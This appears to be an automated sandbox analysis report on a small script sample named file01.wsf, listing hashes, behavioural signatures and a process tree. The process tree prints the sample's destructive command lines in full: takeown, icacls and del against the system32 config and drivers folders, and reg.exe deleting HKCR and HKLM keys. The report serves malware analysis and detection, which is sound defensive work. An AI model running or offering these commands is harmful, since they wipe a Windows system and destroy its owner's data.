Analysis
- max time kernel: 148s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-08-2024 21:41

Static task: static1
Behavioral task: behavioral1
Sample: file01.wsf
Resource: win7-20240708-en
General
- Target: file01.wsf
- Size: 3KB
- MD5: fefe72db31bfdbe4a0ae7f11cb852008
- SHA1: a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
- SHA256: d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
- SHA512: a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
Malware Config

Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process):
  - 4136 icacls.exe
  - 4744 icacls.exe
  - 3464 takeown.exe
  - 3692 takeown.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation (cmd.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Modifies file permissions (1 TTPs, 4 IoCs)
  Processes (pid, process):
  - 3464 takeown.exe
  - 3692 takeown.exe
  - 4136 icacls.exe
  - 4744 icacls.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoCs)
  Processes (description, ioc, process):
  - Key created: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings (cmd.exe)
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, pid, process):
  - Token: SeTakeOwnershipPrivilege, 3464 takeown.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description, pid, process, target process):
  - PID 1408 wrote to memory of 3920: 1408 cmd.exe -> WScript.exe
  - PID 1408 wrote to memory of 3920: 1408 cmd.exe -> WScript.exe
  - PID 3920 wrote to memory of 440: 3920 WScript.exe -> cmd.exe
  - PID 3920 wrote to memory of 440: 3920 WScript.exe -> cmd.exe
  - PID 3920 wrote to memory of 4296: 3920 WScript.exe -> cmd.exe
  - PID 3920 wrote to memory of 4296: 3920 WScript.exe -> cmd.exe
  - PID 4296 wrote to memory of 3464: 4296 cmd.exe -> takeown.exe
  - PID 4296 wrote to memory of 3464: 4296 cmd.exe -> takeown.exe
  - PID 440 wrote to memory of 3692: 440 cmd.exe -> takeown.exe
  - PID 440 wrote to memory of 3692: 440 cmd.exe -> takeown.exe
  - PID 440 wrote to memory of 4136: 440 cmd.exe -> icacls.exe
  - PID 440 wrote to memory of 4136: 440 cmd.exe -> icacls.exe
  - PID 4296 wrote to memory of 4744: 4296 cmd.exe -> icacls.exe
  - PID 4296 wrote to memory of 4744: 4296 cmd.exe -> icacls.exe
  - PID 3920 wrote to memory of 4824: 3920 WScript.exe -> reg.exe
  - PID 3920 wrote to memory of 4824: 3920 WScript.exe -> reg.exe
  - PID 3920 wrote to memory of 3092: 3920 WScript.exe -> reg.exe
  - PID 3920 wrote to memory of 3092: 3920 WScript.exe -> reg.exe
  - PID 3920 wrote to memory of 2388: 3920 WScript.exe -> reg.exe
  - PID 3920 wrote to memory of 2388: 3920 WScript.exe -> reg.exe
Processes (tree; depth shown by indentation)
- [1] C:\Windows\system32\cmd.exe (PID 1408)
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WScript.exe (PID 3920)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe (PID 440)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\takeown.exe (PID 3692)
        Command line: takeown /f c:\windows\system32\config\*
        - Possible privilege escalation attempt
        - Modifies file permissions
      - [4] C:\Windows\system32\icacls.exe (PID 4136)
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
    - [3] C:\Windows\System32\cmd.exe (PID 4296)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\takeown.exe (PID 3464)
        Command line: takeown /f c:\windows\system32\drivers\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\icacls.exe (PID 4744)
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
    - [3] C:\Windows\System32\reg.exe (PID 4824)
      Command line: "C:\Windows\System32\reg.exe" delete HKCR\*.dll
    - [3] C:\Windows\System32\reg.exe (PID 3092)
      Command line: "C:\Windows\System32\reg.exe" delete HKCR\*.exe
    - [3] C:\Windows\System32\reg.exe (PID 2388)
      Command line: "C:\Windows\System32\reg.exe" delete HKLM\*
      - Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: fefe72db31bfdbe4a0ae7f11cb852008
  SHA1: a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
  SHA256: d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
  SHA512: a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0
- Filesize: 79B
  MD5: 355d25ae00d82afebe47bffcaa713a40
  SHA1: c6790a7e5d81ad3d1149974c75947d3b2509f544
  SHA256: 93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
  SHA512: 08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa